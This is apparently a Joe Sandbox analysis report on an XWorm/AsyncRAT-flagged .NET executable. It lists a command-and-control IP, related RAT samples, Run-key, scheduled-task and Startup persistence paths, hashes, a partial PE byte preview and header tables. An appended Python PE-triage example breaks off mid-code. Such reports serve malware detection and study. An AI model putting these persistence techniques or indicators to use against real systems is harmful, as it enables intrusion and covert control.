https://contoso.com/License | powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mic | powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micft.cMicRosof | powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
147.185.221.22 | unknown | United States | | 12087 | SALSGIVERUS | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1539518
                              Start date and time:2024-10-22 19:28:06 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 8s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:fjijTlM2tu.exe
                              renamed because original name is a hash value
                              Original Sample Name:929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@19/21@0/1
                              EGA Information:
                              • Successful, ratio: 12.5%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 80
                              • Number of non-executed functions: 8
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target localsys64.exe, PID 4600 because it is empty
                              • Execution Graph export aborted for target localsys64.exe, PID 6112 because it is empty
                              • Execution Graph export aborted for target localsys64.exe, PID 6428 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 332 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 3412 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 4080 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 6660 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: fjijTlM2tu.exe
Time | Type | Description
13:29:00 | API Interceptor | 57x Sleep call for process: powershell.exe modified
13:30:12 | API Interceptor | 63285x Sleep call for process: fjijTlM2tu.exe modified
18:29:56 | Task Scheduler | Run new task: localsys64 path: C:\Users\user\AppData\Roaming\localsys64.exe
18:29:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run localsys64 C:\Users\user\AppData\Roaming\localsys64.exe
18:30:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run localsys64 C:\Users\user\AppData\Roaming\localsys64.exe
18:30:12 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
147.185.221.22 | gPEbJi1xiY.exe | | malicious | XWorm | |
147.185.221.22 | dHp58IIEYz.exe | | malicious | XWorm | |
147.185.221.22 | 432mtXKD3l.exe | | malicious | XWorm | |
147.185.221.22 | l18t80u9zg.exe | | malicious | XWorm | |
147.185.221.22 | Windows Defender.exe | | malicious | XWorm | |
147.185.221.22 | e7WMhx18XN.exe | | malicious | SilentXMRMiner, Xmrig | |
147.185.221.22 | SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exe | | malicious | Njrat | |
147.185.221.22 | Bpz46JayQ4.exe | | malicious | XWorm | |
147.185.221.22 | e4L9TXRBhB.exe | | malicious | XWorm | |
147.185.221.22 | BootstrapperV1.19.exe | | malicious | XWorm | |
                                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SALSGIVERUS | SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exe | | malicious | SheetRat | | 147.185.221.21
SALSGIVERUS | gPEbJi1xiY.exe | | malicious | XWorm | | 147.185.221.22
SALSGIVERUS | lx3vLwrX57.exe | | malicious | XWorm | | 147.185.221.23
SALSGIVERUS | arm7.elf | | malicious | Unknown | | 147.168.93.87
SALSGIVERUS | file.exe | | malicious | AsyncRAT | | 147.185.221.20
SALSGIVERUS | arm7.elf | | malicious | Unknown | | 147.168.203.92
SALSGIVERUS | MjrlHJvNyq.exe | | malicious | XWorm | | 147.185.221.20
SALSGIVERUS | r8k29DBraE.exe | | malicious | XWorm | | 147.185.221.18
SALSGIVERUS | SpeedHack666Cheat (no VM detected).exe | | malicious | Njrat, RevengeRAT | | 147.185.221.23
SALSGIVERUS | mIURiU8n2P.exe | | malicious | XWorm | | 147.185.221.21
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\AppData\Roaming\localsys64.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................
                                                  Process:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):41
                                                  Entropy (8bit):3.7195394315431693
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                  MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                  SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                  SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                  SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Oct 22 16:29:54 2024, mtime=Tue Oct 22 16:29:54 2024, atime=Tue Oct 22 16:29:54 2024, length=302592, window=hide
                                                  Category:dropped
                                                  Size (bytes):781
                                                  Entropy (8bit):5.1049401798418135
                                                  Encrypted:false
                                                  SSDEEP:12:8jC+4Sd0WCkdY//DR/ygELwH0SjAw/rrHhq6GZWMbBrpBmV:8jcSd/3+75ygm4Ay1qWMb/Bm
                                                  MD5:C5257109C8A33A2340CFD426254C1A1A
                                                  SHA1:6CD358FEF136EC37E00BE5F29CFB57BC4F66B46D
                                                  SHA-256:29A8FAF272898FEF52A0AA753F58E68871DCD5B47F179C81DBEA31A1259132D7
                                                  SHA-512:BCD5D9666FDBED0EC1C12540DFA4EC5CB4ED4562EE91546235BD5594C7E78002906AF26E8E752025CA8117D283298555F447FA8C378A6C498C915FB221AC8F3E
                                                  Malicious:false
                                                  Preview:L..................F.... .....J..$....J..$....J..$..........................~.:..DG..Yr?.D..U..k0.&...&......vk.v.....e..$...Y`..$......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^VY.............................%..A.p.p.D.a.t.a...B.V.1.....VY....Roaming.@......CW.^VY............................k...R.o.a.m.i.n.g.....j.2.....VY.. .LOCALS~1.EXE..N......VY..VY...........................U..l.o.c.a.l.s.y.s.6.4...e.x.e.......\...............-.......[.............]......C:\Users\user\AppData\Roaming\localsys64.exe........\.....\.....\.....\.....\.l.o.c.a.l.s.y.s.6.4...e.x.e.`.......X.......618321...........hT..CrF.f4... ...??.....,.......hT..CrF.f4... ...??.....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                  Process:C:\Users\user\Desktop\fjijTlM2tu.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):302592
                                                  Entropy (8bit):5.890341418244703
                                                  Encrypted:false
                                                  SSDEEP:6144:9hcv9vN1C4q1q6NO+MUIccXc4zkXf9etvQbQseRJh8uEZy:9hny
                                                  MD5:55107DA03A7EE49D56320D0B43945691
                                                  SHA1:E8C75F1A39FEC81A99E3C65C45F965B669286D59
                                                  SHA-256:929395B5D0F521C2A6B556A341DA65343177A3EDCC88862938D5A8CEF166E93C
                                                  SHA-512:F7EE06CC2A0434473B8D728B0FDD8414AAA828516344D98DE2606EA5CF14BD6360FABC934360F65D173B772DE36B56ACFED3F1F7D7FD77CE0599DD2329955231
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\localsys64.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................................@....................................S.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Z...W............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.890341418244703
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:fjijTlM2tu.exe
                                                  File size:302'592 bytes
                                                  MD5:55107da03a7ee49d56320d0b43945691
                                                  SHA1:e8c75f1a39fec81a99e3c65c45f965b669286d59
                                                  SHA256:929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c
                                                  SHA512:f7ee06cc2a0434473b8d728b0fdd8414aaa828516344d98de2606ea5cf14bd6360fabc934360f65d173b772de36b56acfed3f1f7d7fd77ce0599dd2329955231
                                                  SSDEEP:6144:9hcv9vN1C4q1q6NO+MUIccXc4zkXf9etvQbQseRJh8uEZy:9hny
                                                  TLSH:D9548052BA04A29AE64B3CB3106EC53808666D7F46E5855DB58DF73A02F334901DEF3E
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................................@................................
                                                  Icon Hash:daccccd4e2e1e179
                                                  Entrypoint:0x40b32e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x671797AF [Tue Oct 22 12:16:47 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]    ; 0x402000 = Imagebase 0x400000 + IAT RVA 0x2000, the slot that the loader fills with mscoree.dll!_CorExeMain (the only import)
(the next 97 decoded instructions are all `add byte ptr [eax], al`, i.e. opcode 00 00: zero padding after the 6-byte managed-entry stub, not code)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb2d8           0x53          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc000           0x4059c       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x4e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections (Name, Virtual Address, Virtual Size, Raw Size, MD5, Xored PE, ZLIB Complexity, File Type, Entropy, Characteristics)

Name: .text
  Virtual Address: 0x2000  Virtual Size: 0x9334  Raw Size: 0x9400
  MD5: 5a451112ca9ba388bf2601468fe7c04b  Xored PE: False  ZLIB Complexity: 0.49187077702702703
  File Type: data  Entropy: 5.703458714731767
  Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Name: .rsrc
  Virtual Address: 0xc000  Virtual Size: 0x4059c  Raw Size: 0x40600
  MD5: 1ccc66d734c969be8559cb804814c203  Xored PE: False  ZLIB Complexity: 0.13236498786407766
  File Type: data  Entropy: 5.671663807042734
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name: .reloc
  Virtual Address: 0x4e000  Virtual Size: 0xc  Raw Size: 0x200
  MD5: c0d5609670725c27b8145a6315faf01a  Xored PE: False  ZLIB Complexity: 0.044921875
  File Type: data  Entropy: 0.08153941234324169
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size     Type                                                                                Language  Country  ZLIB Complexity
RT_ICON        0xc130   0x40028  Device independent bitmap graphic, 248 x 512 x 32, image size 253952                -         -        0.13036646019589296
RT_GROUP_ICON  0x4c158  0x14     data                                                                                -         -        1.05
RT_VERSION     0x4c16c  0x244    data                                                                                -         -        0.4689655172413793
RT_MANIFEST    0x4c3b0  0x1ea    XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators   -         -        0.5469387755102041
DLL          Import
mscoree.dll  _CorExeMain
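The static data above (IAT at RVA 0x2000, CLR header at 0x2008, entry stub `jmp dword ptr [0x402000]`, a single import of mscoree.dll!_CorExeMain, per-section entropy and ZLIB complexity) is what distinguishes a managed .NET executable from native code at triage time. The following is an added example, not code from the sample or from Joe Sandbox: it builds a minimal PE32 image with the same header shape, then parses it back with the Python standard library to answer two questions a practitioner asks of such a file: is it managed, and does its native entry point do nothing but jump through the IAT? All byte values are constructed for the example; the entry RVA 0x2050 is hypothetical (the sample's is 0xb32e), and the section metrics reproduce the report's two columns on the constructed section, not on the sample.

```python
"""Added example: build a one-section PE32 shaped like the report's static data and
parse it back for .NET triage. Constructed bytes, not the analysed sample."""
import math
import struct
import zlib

IMAGE_BASE, SECTION_ALIGN, FILE_ALIGN = 0x400000, 0x1000, 0x200
TEXT_RVA, TEXT_RAW_PTR, TEXT_RAW_SIZE = 0x2000, 0x200, 0x200
IAT_RVA = 0x2000                   # IMAGE_DIRECTORY_ENTRY_IAT in the report
CLR_RVA, CLR_SIZE = 0x2008, 0x48   # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR in the report
ENTRY_RVA = 0x2050                 # hypothetical; placed right after the CLR header


def build_sample_pe() -> bytes:
    """Emit a minimal PE32 (constructed) whose headers mirror the report's layout."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)       # i386, 1 section, EXE|32BIT
    dirs = [(0, 0)] * 16
    dirs[12], dirs[14] = (IAT_RVA, 8), (CLR_RVA, CLR_SIZE)
    opt = struct.pack(
        "<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
        0x10B, 8, 0,                                 # PE32 magic, linker version
        TEXT_RAW_SIZE, 0, 0,                         # SizeOfCode / InitializedData / UninitializedData
        ENTRY_RVA, TEXT_RVA, 0,                      # AddressOfEntryPoint, BaseOfCode, BaseOfData
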